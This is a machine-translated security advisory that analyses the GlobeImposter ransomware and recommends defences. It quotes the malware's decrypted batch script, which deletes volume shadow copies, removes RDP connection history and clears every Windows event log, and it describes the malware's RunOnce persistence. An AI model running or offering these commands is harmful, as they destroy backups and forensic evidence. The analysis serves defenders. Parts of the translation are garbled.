Shulou(Shulou.com)05/31 Report--

GlobeImposter blackmail virus attack after the file is encrypted to .Walker extension how to do, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

GlobeImposter blackmail virus in a period of time there is no substantial technological update, the recent outbreak in some corporate intranets, less impact on personal computer users. We remind enterprise users to attach great importance to the recent destruction of the GlobeImposter blackmail virus and back up key business systems in advance to avoid serious losses in the business system after being damaged by the blackmail virus.

For systems that have been poisoned, it is recommended that the intranet be offline so that the virus can be cleaned up before it can be reconnected to the network. For other unpoisoned computers in the intranet, the recommendation to log in with a weak password should be modified as soon as possible, using complex passwords composed of letters, numbers and special characters to avoid successful brute force cracking by attackers (corporate network management can be configured to force the use of strong passwords. Do not log in with weak passwords).

Repair operating system patches in time to avoid attacks due to vulnerabilities; if end users do not use remote desktop login service, it is recommended to shut down; if extortion virus invasion has occurred in the local area network, port 135139445 can be temporarily closed (Server service is temporarily disabled) to reduce the possibility of remote intrusion.

Impact rating

High risk, hackers will first invade the corporate intranet, and then through violence to crack RDP and SMB services continue to spread in the intranet. Except for a few folders, all are encrypted, and the damaged files cannot be decrypted and restored unless a key is obtained.

Influence surface

The computers of the Windows system will be affected. At present, the Royal threat Intelligence Center has found that a number of enterprises in Guangdong, Henan, Heilongjiang and other places have been victimized, and it is expected that there will be more in the near future.

Sample analysis 1. Intrusion analysis

It can be seen from an infected user's machine that a large number of port 445 explosions were recorded from August 25 to the early morning of August 26.

The source of the attack is a machine that is not in the local area of the intranet, which shows that there are corresponding risks in all branches of the enterprise.

two。 Sample analysis

Description of encryption algorithm

The blackmail virus uses RSA+AES encryption, which involves two pairs of RSA keys (the hacker's public and private keys and the user's public and private keys, which are represented by hacker_rsa_xxx and user_rsa_xxx respectively) and a pair of AES keys. The hacker RSA key is used to encrypt the user's RSA key, the user's RSA key is used to encrypt the AES key, and the AES key is used to encrypt the contents of the file.

The specific encryption process is as follows:

The blackmail virus first decodes a built-in RSA public key (hacker_rsa_pub), and uses RSA to generate public and private keys (user_rsa_pub and user_rsa_pri) for each victimized user, in which the generated key information is encrypted using the built-in RSA public key (hacker_rsa_Public) as the user ID. After traversing the system files, encrypt the files that meet the encryption requirements. For each file, a unique identifier is generated through CoCreateGuid, and the AES key (marked as file_aes_key) is finally generated from the unique identifier to encrypt the file. During the process of encrypting a file, the unique identifier is encrypted by the RSA public key (user_rsa_pub) and saved to the file.

After receiving the ransom, the user ID and the file, the hacker decrypts the user ID through his own private key (hacker_rsa_pri), and then he can get the user_rsa_pri. Using user_rsa_pri to decrypt the file, he can get the file_aes_key of the file, and then he can decrypt the original file through the AES algorithm.

3. Self-starting analysis

In order to prevent malicious code samples from being easily analyzed, most strings and part of API are encrypted. After running, they will be dynamically decrypted in memory. After decryption, you can see the folder and suffix names that are excluded by the sample during encryption. First get the path of the environment variables "% LOCALAPPADATA%" and "% APPDATA%", then exit if you can't get it; after getting it, copy yourself to the directory, and then add a self-startup item.

After copying, write the path to the following registry key

HKEY_CURRENT_USER\\ Software\\ Microsoft\\ Windows\\ CurrentVersion\\ RunOnce\\ BrowserUpdateCheck to enable self-booting

4. Encryption process analysis

Get each drive letter on the current machine:

Create a thread for each drive letter to encrypt the file

Before encrypting a file, it first filters out the file with the suffix .Walker, the file name HOW_TO_BACK_FILES.html and the saved user ID, as well as the files under the following path:

Then encrypt it.

GlobeImposter encrypts files using the AES encryption algorithm. AES encrypted KEY is randomly generated locally. First of all, the IV parameter of AES encryption is generated by the size and path of the current file. The IV parameter takes the first 16 digits after MD (filesize | | filename).

Use MBEDTLS_MD_SHA256 to calculate the HASH twice between IV and another generated secret key, and use the HASH result as an AES encrypted KEY

The guid is then encrypted using the built-in RSA public key, and the encrypted guid and user ID are written to the current file.

Finally, encrypt the contents of the file with AES

5. Self-deletion analysis

Self-delete by calling CMD / c del

In the Temp directory, release the .bat script file, which is mainly used to delete the remote Desktop connection information file default.rdp, and delete the log information through the wevtutil.exe cl command

The contents of the decrypted bat file are as follows

@ echo offvssadmin.exe Delete Shadows / All / Quietreg delete "HKEY_CURRENT_USER\ Software\ Microsoft\ Terminal Server Client\ Default" / va / freg delete "HKEY_CURRENT_USER\ Software\ Microsoft\ Terminal Server Client\ Servers" / freg add "HKEY_CURRENT_USER\ Software\ Microsoft\ Terminal Server Client\ Servers" cd% userprofile%\ documents\ attrib Default.rdp-s-hdel Default.rdp for / F "tokens=*"% in ('wevtutil.exe el') DO wevtutil.exe cl "% 1 solution

1. Professional terminal security management software is installed throughout the network, and administrators disinfect viruses and install patches in batches, and then regularly update all kinds of high-risk patches of the system.

two。 Deploy traffic monitoring / blocking equipment / software to facilitate prior detection, blocking and backtracking.

3. It is suggested that for systems that cannot install patches in time due to other reasons, consider setting strict access control policies on network boundaries, routers and firewalls to ensure the dynamic security of the network.

4. It is suggested that for systems with weak passwords, users should be urged to change their passwords on the premise of strengthening their security awareness, or use policies to forcibly limit the length and complexity of passwords.

5. It is suggested that for services with weak passwords or empty passwords, password strength should be strengthened and encrypted transmission should be used in some key services. For some services that can be shut down, it is recommended to close unwanted service ports for security purposes. Do not use the same password to manage multiple critical servers.

6. It is suggested that network administrators, system administrators and security administrators should pay attention to security information, security dynamics and the latest serious vulnerabilities, the cycle of attack and defense, accompanied by the life cycle of each mainstream operating system and application service.

7. It is recommended to configure the password policy of the database account and strengthen the policies such as the maximum number of wrong logins, locking more than valid times, password validity, grace time after expiration, password reuse and so on.

8. It is recommended that the address of the management access node of the database be strictly restricted and only the specific management host IP is allowed to log in to the database remotely.

In order to prevent hackers from invading, a more perfect protection system is needed: each terminal uses professional antivirus software to prevent virus attacks. As far as managers are concerned, security products with omni-directional security management functions such as terminal antivirus unified control, loophole repair unified control, and policy control can be used to comprehensively understand and manage the security situation of the enterprise intranet and protect the enterprise security.

In addition, products such as advanced threat detection systems, situational awareness platforms and cyberspace risk radars are deployed on the intranet, it is helpful to establish a set of security system integrating risk monitoring, analysis, early warning, response and visualization in the aspects of terminal security, border security, website monitoring and unified monitoring, so as to ensure the network security of enterprise users in all directions and prevent hackers from invading in a timely manner.

In order to prevent extortion virus attacks, enterprise users should patch the servers in time, close unnecessary file sharing, ports and services as far as possible, adopt high-strength unique server accounts / passwords and change them regularly, set access control for internal access of servers / workstations that have no need for interconnection, and use Tencent defense points on terminal computers to defend against virus Trojan attacks.

At the same time, it is recommended that enterprise users configure the backup system for key business to create multiple backups and remote backups of important business data, so as to prevent the backup data from being destroyed by blackmail viruses. Once there is a virus infection event, it can also quickly restore and rebuild the business system to avoid major losses.

Individual users can install operating system vulnerability patches in time, safely back up important data and files, and open document guardians to protect them from blackmail viruses.

MD506cf8bdf3c3a3dbe7c054cb4ff98b28f homologous virus sample MD5 (the difference is only after the encrypted file is dropped out)

8fd381a971872db6e8e67c838070c49f

9f5d9e2b4ebb9ffe10ca665bd3007562

8cabf7aad09357ff658e078c01d41dd2

1b63d6f158e306e095d39de60b2ae4ec

Cb379148ae15024738913e5853f19381

74dfac6a06795a4a0eed158f47eead7b

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.